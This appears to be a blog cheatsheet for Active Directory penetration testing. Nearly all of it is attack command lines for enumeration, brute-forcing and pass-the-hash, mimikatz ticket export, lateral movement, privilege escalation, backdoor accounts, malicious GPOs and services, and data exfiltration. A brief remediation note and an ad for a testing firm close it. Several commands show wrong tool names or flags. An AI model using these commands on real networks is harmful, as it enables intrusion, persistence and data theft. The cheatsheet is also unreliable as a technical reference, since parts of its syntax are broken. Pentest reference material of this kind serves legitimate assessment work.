Home Did you know ? Active Directory Penetration Testing Cheatsheet

Active Directory Penetration Testing Cheatsheet

Master Active Directory Security Assessments with these Essential Techniques

by Mic Johnson
active directory penetration testing

Active Directory (AD) is a vital component of many organizations’ IT infrastructures, managing user accounts, authentication, and access control. It’s crucial to regularly test its security through penetration testing to identify vulnerabilities and protect your network. This cheatsheet covers essential techniques and tools for effective Active Directory penetration testing, including command examples for various tools.

Information Gathering and Reconnaissance

Enumerate Active Directory Infrastructure

DNS Zone Transfers:

  • dig axfr @ns.example.com example.com
  • nslookup -type=AXFR example.com ns.example.com

LDAP Queries:

  • ldapsearch -x -LLL -H ldap://dc.example.com -D "CN=Administrator,CN=Users,DC=example,DC=com" -w "Password" -b "DC=example,DC=com"

SMB Shares Enumeration:

  • smbclient -L \\\\target-ip\\ -U user
  • nmap --script=smb-enum-shares -p445 target-ip

Kerberos Enumeration:

  • kerberos_enumusers -d EXAMPLE.COM -u 'Administrator' -p 'password'
  • GetUserSPNs.py -request -dc-ip target-ip -domain EXAMPLE.COM -u 'Administrator' -p 'password'

Identify Vulnerable Services and Misconfigurations

Insecure LDAP Bindings:

  • tcpdump -i eth0 -vvv -s 0 -l -n port 389
  • wireshark -k -i eth0 -f "port 389"

Password Policies:

  • ldapsearch -x -LLL -H ldap://dc.example.com -D "CN=Administrator,CN=Users,DC=example,DC=com" -w "Password" -b "CN=Default Domain Policy,CN=System,DC=example,DC=com"
  • Get-ADDefaultDomainPasswordPolicy

Unconstrained Delegation:

  • Get-DomainUser -Properties UserAccountControl -Filter {TrustedForDelegation -eq 'True'}
  • ldapsearch -x -LLL -H ldap://dc.example.com -D "CN=Administrator,CN=Users,DC=example,DC=com" -w "Password" -b "DC=example,DC=com" "msDS-AllowedToDelegateTo=*"

Exploitation

Exploit Active Directory Vulnerabilities

Password Attacks:

  • crackmapexec smb target-ip -u user -p password
  • hydra -L users.txt -P passwords.txt smb://target-ip
  • pth-winexe -U user%hash //target-ip cmd

Kerberos Attacks:

  • mimikatz "privilege::debug" "sekurlsa::tickets /export" exit
  • kekeo tgt::ask /user:Administrator /domain:example.com /rc4:hash

Lateral Movement:

  • psexec.py user:password@target-ip cmd
  • wmiexec.py user:password@target-ip
  • Enter-PSSession -ComputerName target-ip -Credential (Get-Credential)

Privilege Escalation:

  • powershell -exec bypass -Command "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
  • powershell -exec bypass -Command "Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All"
  • SharpHound.exe --CollectionMethod All -d example.com -u Administrator -p password

Post-Exploitation

Maintain Access and Exfiltrate Data

Persistence:

  • Create a backdoor user account: net user backdoor-user backdoor-password /add /domain
  • Modify Group Policy Objects (GPO): New-GPO -Name "Malicious GPO" | New-GPLink -Target "OU=Workstations,DC=example,DC=com"
  • Deploy a malicious service executable: sc.exe \\\\target-ip create MaliciousService binPath= "C:\\Windows\\malicious.exe" start= auto

Data Exfiltration:

  • smbclient \\\\target-ip\\share -U user%password -c 'get sensitive-data.txt'
  • scp user@target-ip:/path/to/sensitive-data.txt ./
  • nc -w 3 target-ip 1234 < sensitive-data.txt

Reporting and Remediation

Communicate Findings and Strengthen Active Directory Security

  1. Reporting: Clearly document vulnerabilities, risks, and remediation recommendations for clients.
  2. Remediation: Implement suggested security measures, such as multi-factor authentication, strong password policies, and least-privilege access controls to strengthen Active Directory security.

By following this Active Directory penetration testing cheatsheet, security professionals can identify vulnerabilities in their AD infrastructure and take proactive steps to safeguard their network. Regular penetration testing and security assessments are crucial to maintaining a secure IT environment.

If you are a company that requires an internal network penetration test consider Aardwolf Security for your next provider, they utilise senior CREST accredited network penetration testers and have excellent TrustPilot reviews.

You may also like

1 comment

ALOK.K.Y April 30, 2023 - 4:57 pm

I AM INTERESTED

Comments are closed.